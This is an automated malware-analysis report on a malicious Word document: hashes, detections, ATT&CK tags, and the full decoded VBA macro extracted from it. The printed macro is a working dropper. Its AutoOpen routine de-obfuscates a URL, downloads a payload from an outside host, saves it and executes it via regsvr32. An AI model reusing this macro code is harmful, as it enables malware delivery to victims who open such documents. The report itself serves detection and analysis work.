Office (OOXML) malware analysis — malicious · d2b3bff49d5381ae

MALICIOUS

Office (OOXML)

133.0 KB Created: 2020-07-09 00:04:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-15

MD5: 30b85636bb4e9be61434d701cc1c4809 SHA-1: e647332abb5d9e2c3ae077937cfe07a7b7f86b9a SHA-256: d2b3bff49d5381ae41e4903277538591b7ce9df1e932d3069a32f4a78ac0816f

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro executes a function that appears to download a file from the obfuscated URL "http://h7t1t7p6:c/3/bh8q730ldl6.bcco9mb/0iez25f/ay0a2cfaf.6pch8pe?0l1=bk4p8t41b22.9c1abb5" and saves it to "C:\7\4pbr2o7gbrfa6m4dda4tfa8\e2520511d0f.2j5p3g6". This downloaded file is then executed, indicating a downloader or droppper functionality.

Heuristics 6

ClamAV: Doc.Dropper.Agent-8708109-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-8708109-0
External relationship high OOXML_EXTERNAL_REL

External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\it.jpg
VBA project inside OOXML medium 2 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
- http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
- http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
- http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	3220 bytes
SHA-256: `bf5856071ff0a66972aeb0b542fb49d526a2385ff959c41b5e029644bd928b3d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "ba4242f2" Function f0b6be19() f0b6be19 = Application.ActiveDocument.Application End Function Function bd8bbb5d() bd8bbb5d = ActiveWindow.Split End Function Sub fb9316e2(bbc79467, c891bee4) Dim b53313da b53313da = FreeFile Open bbc79467 For Output As #b53313da Print #b53313da, d352c807(c891bee4) Close #b53313da End Sub Function cd18c9d0() cd18c9d0 = ActiveWindow.WindowState End Function Function c3f38880() c3f38880 = Application.ActiveDocument.Creator End Function Function f453daca(dcb13349) d13fa101 = Len(dcb13349) For ffc41f61 = 1 To d13fa101 Step 2 fa44eb9d = fa44eb9d & Mid(dcb13349, ffc41f61, 1) Next f453daca = fa44eb9d End Function Function b3427004() b3427004 = ActiveWindow.Selection End Function Function ef072479() ef072479 = ActiveWindow.View End Function Sub be34d308() End Sub Function bc5086ba() bc5086ba = Application.ActiveDocument.AttachedTemplate End Function Function c20a7730() c20a7730 = Application.ActiveDocument.AutoSaveOn End Function Sub AutoOpen() Dim d2c1fced As New a05149dc fb9316e2 f453daca("ca:7\4pbr2o7gbrfa6m4dda4tfa8\e2520511d0f.2j5p3g6"), d2c1fced.f7f2d427(f453daca("h7t1t7p6:c/3/bh8q730ldl6.bcco9mb/0iez25f/ay0a2cfaf.6pch8pe?0l1=bk4p8t41b22.9c1abb5")) Dim a45fb53b As New WshShell a45fb53b.exec e117526c & " " & f453daca("ca:7\4pbr2o7gbrfa6m4dda4tfa8\e2520511d0f.2j5p3g6") End Sub Attribute VB_Name = "d5a96673" Function a0f2e2ef() a0f2e2ef = 22383 End Function Function fc1f79ea() fc1f79ea = ActiveWindow.DisplayScreenTips End Function Function d352c807(fe9b7f10) d352c807 = StrConv(fe9b7f10, 64) End Function Function aef7ed93() aef7ed93 = ActiveWindow.DisplayRulers End Function Function b54f2409() b54f2409 = Application.ActiveDocument.AutoSaveOn End Function Function cf578a75() End Function Function e82a4fe6() e82a4fe6 = ActiveWindow.Selection End Function Function a15f0da1(dbfafd1anp As String) As Boolean If 883 - 26 = Len(dbfafd1anp) Then a15f0da1 = True End If End Function Function e117526c() e117526c = f453daca("rbe3gesdv5r43724") End Function Attribute VB_Name = "a05149dc" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function cc5831d3() cc5831d3 = 11930 * 1 End Function Function e54248da() e54248da = ActiveWindow.View End Function Function f7f2d427(dd8f6dee) Dim b446aea3 As Object Set b446aea3 = New MSXML2.XMLHTTP30 Call b446aea3.Open("GET", dd8f6dee, False) b446aea3.Send f7f2d427 = b446aea3.responsebody End Function Function c3fd99a1() c3fd99a1 = ActiveWindow.Selection End Function Function c211c59f() c211c59f = Application.ActiveDocument.ActiveThemeDisplayName End Function Function eaa27eb2(da69f5f9) End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	24064 bytes
SHA-256: `abb15ae5965542a082237d2ffaa528d3636d81f81b3a59e88b7a7d67e55e4703`

Open this report in the interactive analyzer, or submit your own file for analysis.